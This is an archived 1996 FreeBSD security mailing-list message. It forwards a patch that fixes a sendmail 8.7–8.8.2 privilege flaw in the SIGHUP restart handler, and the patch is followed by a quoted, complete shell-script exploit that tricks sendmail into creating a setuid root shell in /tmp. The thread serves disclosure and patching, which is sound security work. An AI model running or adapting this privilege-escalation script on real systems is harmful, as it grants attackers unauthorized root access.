Date: Sat, 16 Nov 1996 11:27:28 -0800 From: Cy Schubert <cy@cwsys.cwent.com> To: security-officer@freebsd.org Cc: freebsd-security@freebsd.org Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Message-ID: <199611161927.LAA04262@cwsys.cwent.com>
next in thread | raw e-mail | index | archive | help
This appears to be a better fix, and it works too.
Regards, Phone: (604)389-3827
Cy Schubert OV/VM: BCSC02(CSCHUBER)
Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET
ITSD Internet: cschuber@uumail.gov.bc.ca
cschuber@bcsc02.gov.bc.ca
"Quit spooling around, JES do it."
------- Forwarded Message
Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA23212 for cy; Sat, 16 Nov 1996 08:40:16 -0800 (PST)
X-UIDL: 848169128.001
Resent-From: Cy Schubert - ITSD Open Systems Group <cschuber@uumail.gov.bc.ca>
Resent-Message-Id: <199611161640.IAA23212@passer.osg.gov.bc.ca>
Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA22021 for <cschuber@passer.osg.gov.bc.ca>; Sat, 16 Nov 1996 08:40:15 -0800 (PST)
Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4)
id AA02926; Sat, 16 Nov 1996 08:40:13 -0800
Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id IAA02623; Sat, 16 Nov 1996 08:38:55 -0800 (PST)
Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id DAA30954; Sun, 17 Nov 1996 03:35:59 +1100
Prev-Resent-Date: Sun, 17 Nov 1996 03:35:59 +1100
Old-X-Envelope-From: cjs@portal.ca Sun Nov 17 03:27:52 1996
X-Authentication-Warning: didactic.cynic.net: cjs owned process doing -bs
Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST)
From: Curt Sampson <cjs@portal.ca>
X-Sender: cjs@didactic
To: Leshka Zakharoff <leshka@leshka.chuvashia.su>
Cc: best-of-security@suburbia.net
In-Reply-To: <199611160110.EAA04168@leshka.chuvashia.su>
Message-Id: <Pine.NEB.3.93.961116000142.140S-100000@didactic>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved: proff@suburbia.net
Prev-Resent-Message-Id: <"2hTZt3.0.dZ7.krUZo"@suburbia>
Prev-Resent-From: best-of-security@suburbia.net
X-Mailing-List: <best-of-security@suburbia.net> archive/latest/509
X-Loop: best-of-security@suburbia.net
Precedence: list
Prev-Resent-Sender: best-of-security-request@suburbia.net
Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Resent-To: cy@uumail.gov.bc.ca
Resent-Date: Sat, 16 Nov 96 08:40:16 -0800
Resent-XMts: smtp
Huh. Yet another gaping hole, can you believe it? This is entirely
platform-independent, and has not yet been fixed in 8.2.2. Here's
the patch to fix it. This was done on 8.7.6; the line numbers may
differ in other versions but the patch is the same.
- ------------------------------------------------------
- --- main.c.old Mon Sep 16 12:56:01 1996
+++ main.c Fri Nov 15 23:56:48 1996
@@ -1693,14 +1693,16 @@
sighup()
{
#ifdef LOG
if (LogLevel > 3)
syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]);
#endif
releasesignal(SIGHUP);
+ (void) setgid(RealGid);
+ (void) setuid(RealUid);
execv(SaveArgv[0], (ARGV_T) SaveArgv);
#ifdef LOG
if (LogLevel > 0)
syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]);
#endif
exit(EX_OSFILE);
}
- ------------------------------------------------------
Now who the heck to I send this to to get it back into sendmail? There
are no e-mail addresses listed for bug reports in the READ_ME file, or
anywhere else for that matter.
cjs
Curt Sampson cjs@portal.ca Info at http://www.portal.ca/
Internet Portal Services, Inc.
Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil.
On Sat, 16 Nov 1996, Leshka Zakharoff wrote:
> Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK)
> From: Leshka Zakharoff <leshka@leshka.chuvashia.su>
> To: best-of-security@suburbia.net
> Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
> Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100
> Resent-From: best-of-security@suburbia.net
>
> #-------------------------------- CUT HERE -------------------------------------
> #/bin/sh
> #
> #
> # Hi !
> # This is exploit for sendmail smtpd bug
> # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
> # This shell script does a root shell in /tmp directory.
> # If you have any problems with it, drop me a letter.
> # Have fun !
> #
> #
> # ----------------------
> # ---------------------------------------------
> # ----------------- Dedicated to my beautiful lady ------------------
> # ---------------------------------------------
> # ----------------------
> #
> # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
> #
> #
> #
> echo 'main() '>>leshka.c
> echo '{ '>>leshka.c
> echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
> echo '} '>>leshka.c
> #
> #
> echo 'main() '>>smtpd.c
> echo '{ '>>smtpd.c
> echo ' setuid(0); setgid(0); '>>smtpd.c
> echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
> echo '} '>>smtpd.c
> #
> #
> cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
> ./leshka
> kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
> rm leshka.c leshka smtpd.c /tmp/smtpd
> /tmp/sh
> #-------------------------------- CUT HERE -------------------------------------
>
>
------- End of Forwarded Message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199611161927.LAA04262>